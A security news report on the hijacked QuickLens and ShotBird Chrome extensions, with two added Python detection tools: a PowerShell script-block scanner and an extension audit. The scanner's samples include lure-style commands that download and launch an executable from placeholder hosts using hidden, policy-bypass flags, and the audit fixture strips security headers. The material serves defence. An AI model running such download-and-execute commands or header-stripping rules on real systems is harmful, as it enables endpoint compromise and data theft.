Two Chrome extensions were weaponized after apparent ownership transfers, allowing attackers to push remote JavaScript, bypass browser protections, and harvest data. QuickLens had about 7,000 users and ShotBird about 800 users. The QuickLens update appeared on February 17, 2026.
KEY FACTS
- Incident: Two Chrome extensions were updated to include malicious capabilities
- Extensions: QuickLens and ShotBird
- Users: QuickLens ~7,000 users, ShotBird ~800 users
- Technique: Remote JavaScript execution, header stripping, and host-level payload delivery
In a technical analysis by monxresearch-sec, researchers found the QuickLens update removed security headers such as X-Frame-Options, polled a command server every five minutes for JavaScript, stored payloads in local storage, and executed them by inserting a hidden 1×1 image whose onload attribute ran the code.
The ShotBird code delivered JavaScript by direct callbacks that displayed a fake Chrome update prompt. Clicking the prompt led users into a flow that instructed them to run a PowerShell command, which downloaded an executable named googleupdate.exe on Windows machines.
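Detection logic for the follow-on step described above (a fake update prompt that has the user paste a PowerShell command which downloads an executable), as an added Python example run over PowerShell script-block text such as the body of Event ID 4104 records. This is not the researchers' tooling, the log lines are constructed rather than captured, and the `.invalid` URLs are placeholders.

```python
"""Triage PowerShell script-block text for the download-and-run pattern the
ShotBird lure used. Constructed example; the sample blocks are made up."""
import re

# Download cradles that fetch a file from a URL.
DOWNLOAD = re.compile(
    r"\b(Invoke-WebRequest|iwr|Start-BitsTransfer|curl|wget)\b|\.DownloadFile\s*\(", re.I)
# An .exe written to a user-writable location.
USER_WRITABLE_EXE = re.compile(
    r"(\$env:TEMP|\$env:APPDATA|\$env:LOCALAPPDATA|\\Temp\\|\\Downloads\\)[^\s;]*\.exe", re.I)
# The updater name from the report; the legitimate binary lives under Program Files.
FAKE_UPDATER = re.compile(r"googleupdate\.exe", re.I)
LEGIT_UPDATER_DIR = re.compile(r"Program Files( \(x86\))?\\Google\\Update\\", re.I)
# Flags typical of "paste this command" lures.
EVASION_FLAGS = re.compile(
    r"-(ExecutionPolicy\s+Bypass|ep\s+bypass|w(indowStyle)?\s+hidden|nop\b|NoProfile|enc(odedCommand)?)",
    re.I)
# Immediate execution of a dropped or referenced binary.
LAUNCH = re.compile(r"\b(Start-Process|saps)\b|&\s*['\"$]", re.I)


def classify(script):
    """Return the list of indicator labels matched by one script block."""
    reasons = []
    if DOWNLOAD.search(script):
        reasons.append("download_cradle")
    if USER_WRITABLE_EXE.search(script):
        reasons.append("exe_in_user_writable_path")
    if FAKE_UPDATER.search(script) and not LEGIT_UPDATER_DIR.search(script):
        reasons.append("updater_name_outside_program_files")
    if EVASION_FLAGS.search(script):
        reasons.append("evasion_flags")
    if LAUNCH.search(script):
        reasons.append("launches_binary")
    return reasons


def severity(reasons):
    """Download plus a dropped/fake-updater executable is the high-confidence combination."""
    if "download_cradle" in reasons and (
            "exe_in_user_writable_path" in reasons
            or "updater_name_outside_program_files" in reasons):
        return "high"
    if len(reasons) >= 2:
        return "medium"
    return "low" if reasons else "none"


# Constructed script blocks: benign admin command, legitimate updater invocation,
# a lure-style download of googleupdate.exe into TEMP, and a hidden-window variant.
SAMPLE_SCRIPT_BLOCKS = [
    r'Get-ChildItem C:\Users\alice\Documents | Measure-Object',
    r'& "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /c',
    r'Invoke-WebRequest -Uri https://update.invalid/chrome -OutFile $env:TEMP\googleupdate.exe; '
    r'Start-Process $env:TEMP\googleupdate.exe',
    r'powershell -w hidden -ep bypass -c "iwr https://cdn.invalid/u -OutFile $env:APPDATA\svc.exe"',
]


def scan(blocks):
    """Return (index, severity, reasons) for every block that matched something."""
    results = []
    for i, block in enumerate(blocks):
        reasons = classify(block)
        if reasons:
            results.append((i, severity(reasons), reasons))
    return results


if __name__ == "__main__":
    for idx, sev, why in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {idx}: {sev:6} {', '.join(why)}")
```

The legitimate-updater check matters in practice: Google's own updater is named GoogleUpdate.exe, so alerting on the file name alone produces noise; the rule only flags the name when it appears outside the Program Files location.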
The malicious extensions can strip security headers and bypass Content Security Policy protections, inject scripts into pages, hook input and form elements, and capture entered data and stored browser information, including saved credentials and history.
QuickLens is no longer available on the Chrome Web Store while ShotBird remained accessible at the time of reporting. Users are advised to remove unknown extensions, avoid installing unverified productivity add-ons, and audit browsers for unexpected entries.
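An audit of installed extensions that covers both the QuickLens mechanics described earlier (security-header stripping, broad host access, a polling loop, payloads parked in local storage, execution through an onload attribute) and the "audit browsers for unexpected entries" advice here, as an added Python example. It is not the researchers' tooling or either extension's code. It assumes the standard Chrome profile layout `<profile>/Extensions/<id>/<version>/manifest.json`; the two fixture extensions, their names and IDs, and the `example.invalid` URL are constructed.

```python
"""Constructed audit of an unpacked Chrome profile's extensions. Flags the
behaviours the report describes; every flag is a review prompt, not proof."""
import json
import re
import tempfile
from pathlib import Path

# Response headers whose removal defeats framing and CSP protections.
SENSITIVE_HEADERS = {"x-frame-options", "content-security-policy"}

# Source-level indicators of the reported delivery chain.
JS_INDICATORS = {
    "periodic_poll": re.compile(r"\bsetInterval\s*\("),
    "remote_fetch": re.compile(r"\bfetch\s*\(\s*['\"`]https?://"),
    "payload_in_storage": re.compile(r"localStorage\.setItem\s*\("),
    "onload_attribute": re.compile(r"setAttribute\s*\(\s*['\"]onload['\"]"),
    "dynamic_code": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
}


def stripped_headers(manifest, ext_dir):
    """Sensitive response headers removed by declarativeNetRequest rule files."""
    found = set()
    for res in manifest.get("declarative_net_request", {}).get("rule_resources", []):
        rule_file = ext_dir / res.get("path", "")
        if not rule_file.is_file():
            continue
        for rule in json.loads(rule_file.read_text(encoding="utf-8")):
            action = rule.get("action", {})
            if action.get("type") != "modifyHeaders":
                continue
            for hdr in action.get("responseHeaders", []):
                name = hdr.get("header", "").lower()
                if hdr.get("operation") == "remove" and name in SENSITIVE_HEADERS:
                    found.add(name)
    return sorted(found)


def js_indicators(ext_dir):
    """Map indicator label -> JS files in the extension that match it."""
    hits = {}
    for js in sorted(ext_dir.rglob("*.js")):
        text = js.read_text(encoding="utf-8", errors="replace")
        for label, rx in JS_INDICATORS.items():
            if rx.search(text):
                hits.setdefault(label, []).append(js.name)
    return hits


def audit_extension(ext_dir):
    manifest = json.loads((ext_dir / "manifest.json").read_text(encoding="utf-8"))
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    report = {
        "id": ext_dir.parent.name,
        "name": manifest.get("name", "?"),
        "version": manifest.get("version", "?"),
        "broad_host_access": bool(perms & {"<all_urls>", "*://*/*"}),
        "header_rewrite_capable": bool(perms & {"declarativeNetRequest", "webRequest", "webRequestBlocking"}),
        "strips_headers": stripped_headers(manifest, ext_dir),
        "js_indicators": js_indicators(ext_dir),
    }
    # Crude triage score: each stripped header weighs most, then host access, then source hits.
    report["score"] = (3 * len(report["strips_headers"]) + int(report["broad_host_access"])
                       + len(report["js_indicators"]))
    return report


def audit_profile(profile):
    """Audit every installed extension version under <profile>/Extensions, riskiest first."""
    manifests = sorted(Path(profile).glob("Extensions/*/*/manifest.json"))
    return sorted((audit_extension(m.parent) for m in manifests), key=lambda r: -r["score"])


def build_fixture(root):
    """Constructed profile: one benign extension and one showing the reported traits."""
    root = Path(root)
    benign = root / "Extensions" / "aaaabbbbccccddddeeeeffffgggghhhh" / "1.0_0"
    benign.mkdir(parents=True)
    (benign / "manifest.json").write_text(json.dumps(
        {"name": "Note Taker", "version": "1.0", "manifest_version": 3, "permissions": ["storage"]}))
    (benign / "popup.js").write_text("chrome.storage.local.set({note: 'hi'});")
    suspect = root / "Extensions" / "zzzzyyyyxxxxwwwwvvvvuuuuttttssss" / "2.3_0"
    suspect.mkdir(parents=True)
    (suspect / "manifest.json").write_text(json.dumps({
        "name": "Lens Helper", "version": "2.3", "manifest_version": 3,
        "permissions": ["declarativeNetRequest", "storage"], "host_permissions": ["<all_urls>"],
        "declarative_net_request": {"rule_resources": [{"id": "r", "enabled": True, "path": "rules.json"}]}}))
    (suspect / "rules.json").write_text(json.dumps([{
        "id": 1, "priority": 1, "condition": {"urlFilter": "*"},
        "action": {"type": "modifyHeaders", "responseHeaders": [
            {"header": "X-Frame-Options", "operation": "remove"},
            {"header": "Content-Security-Policy", "operation": "remove"}]}}]))
    # Detached fragments carrying only the textual indicators; not working code.
    (suspect / "bg.js").write_text('setInterval(poll, 5 * 60 * 1000);\nfetch("https://example.invalid/job");\n'
                                   'localStorage.setItem("job", body);\nimg.setAttribute("onload", handler);\n')
    return root


def run_demo():
    """Build the fixture in a temp dir and audit it."""
    return audit_profile(build_fixture(tempfile.mkdtemp()))


if __name__ == "__main__":
    for r in run_demo():
        print(r["score"], r["id"], r["name"], r["strips_headers"], sorted(r["js_indicators"]))
```

To run it against a real profile, call `audit_profile` with the Chrome user-data directory (for example `~/.config/google-chrome/Default` on Linux) and review anything that strips headers or combines `<all_urls>` with a polling loop; the score ranks what to look at first, it does not decide.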
WHY IT MATTERS
Weaponized extensions can convert widely deployed productivity tools into persistent data exfiltration and endpoint compromise mechanisms. Treat browser extensions as an attack surface and remove or audit untrusted add-ons.